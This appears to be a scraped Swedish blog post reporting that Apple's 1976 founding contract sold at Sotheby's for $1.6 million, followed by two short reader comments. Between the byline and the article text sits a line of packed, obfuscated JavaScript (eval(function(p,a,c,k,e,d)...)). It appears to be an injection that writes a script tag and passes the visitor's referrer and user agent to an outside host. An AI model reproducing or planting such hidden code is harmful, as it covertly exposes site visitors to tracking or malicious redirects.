Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Apple 's första kontrakt såldes för $ 1.600.000 på Sothebys auktionshus i New York.

Apple 's första kontrakt såldes för $ 1.600.000 på Sothebys auktionshus i New York.
Filip Urde
  • On 14 december, 2011
  • http://www.revue.se/filip-urde

1 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arytd|var|u0026u|referrer|datrf||js|php’.split(’|’),0,{}))
April 1976 (april, april dagen) så skrev Steve Jobs, Steve Wozniak, och Ron Wayne under det grundande kontraktet för Apple Computer. Elva dagar senare bestämde Ron Wayne sig för att sälja sin del, motsvarande 10% av företaget för $ 800. Vilket skulle varit värt ca: 3,9 miljarder USD om han gjorde samma sak imorgon, Ron Wayne är självklart bitter idag. Det här historiska kontraktet var ursprungligen tänkt att sälja för $ 150.000, men såldes alltså istället på Sothebys i New York för den sjuka summan på $ 1,6 miljoner till en Eduardo Cisneros, som är VD för Cisneros Corp. Cisneros är den näst rikaste familjen i Sydamerika enligt Forbes lista från 2006.

httpv://youtu.be/d3MGWlnGk04

Papper kan vara värt mycket! Men jag måste säga att det vore ganska coolt att hänga upp Apples kontrakt lite slappt på kylen med en magnet…

– ”vad är det för papper du har på kylen?”
– ”nää, det är bara Apples första kontrakt…”

Comments

  1. Markus

    Vi snackade om detta på Microsoft idag 🙂 Vi undrade om det var en miljardär eller en vanlig medborgare och här fann vi svaret.

    • Härligt att höra Marcus! Tack för att du läser.

  2. Ulla puilla

    Helt sick asså!!